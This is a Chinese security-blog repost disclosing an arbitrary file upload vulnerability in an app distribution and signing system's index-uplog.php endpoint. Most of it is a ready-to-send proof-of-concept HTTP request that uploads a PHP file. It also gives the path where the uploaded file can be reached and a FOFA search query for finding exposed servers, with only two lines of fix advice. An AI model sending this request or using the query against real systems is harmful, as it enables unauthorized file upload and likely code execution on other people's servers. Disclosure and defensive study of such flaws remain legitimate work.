2024年6月27日01:18:47评论13 views字数 641阅读2分8秒阅读模式

漏洞影响范围

无

漏洞复现

poc

POST /source/pack/upload/2upload/index-uplog.php HTTP/2Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept: */*Content-Type: multipart/form-data; boundary=----123456123Content-Length: 197

------123456123Content-Disposition: form-data; name="time"

1-22------123456123Content-Disposition: form-data; name="app"; filename="1.php"Content-Type: image/jpeg

123456123------123456123--

出现如下数据代表漏洞存在：

APP分发签名系统index-uplog.php存在任意文件上传漏洞

url+/source/data/tmp/1-22.php

APP分发签名系统index-uplog.php存在任意文件上传漏洞

修复建议

限制接口访问

2.联系厂商进行修复

搜索语法

fofa:body="/api/statistics/service-usage-amount"

原文始发于微信公众号（小白菜安全）：APP分发签名系统index-uplog.php存在任意文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

APP分发签名系统index-uplog.php存在任意文件上传漏洞

漏洞复现

url+/source/data/tmp/1-22.php

修复建议

搜索语法

2024 年 6 月 WordPress 漏洞及补丁汇总

碧海威L7产品 confirm 命令执行漏洞

CVE-2024-29943 Firefox RCE （附EXP）

Pear Admin Boot系统getDictItems接口SQL注入漏洞（CVE-2024-6241）

易天智能eHR管理平台权限管理不当漏洞

漏洞预警 | 红帆iOffice任意文件读取漏洞

权限提升 | CVE-2024-30088 Windows内核提权漏洞

漏洞预警 | 通天星CMSV6车载视频监控平台SQL注入和信息泄露漏洞

用友u9 GetConnectionString存在信息泄露漏洞

大华DSS数字监控系统多处漏洞

发表评论

在线咨询

微信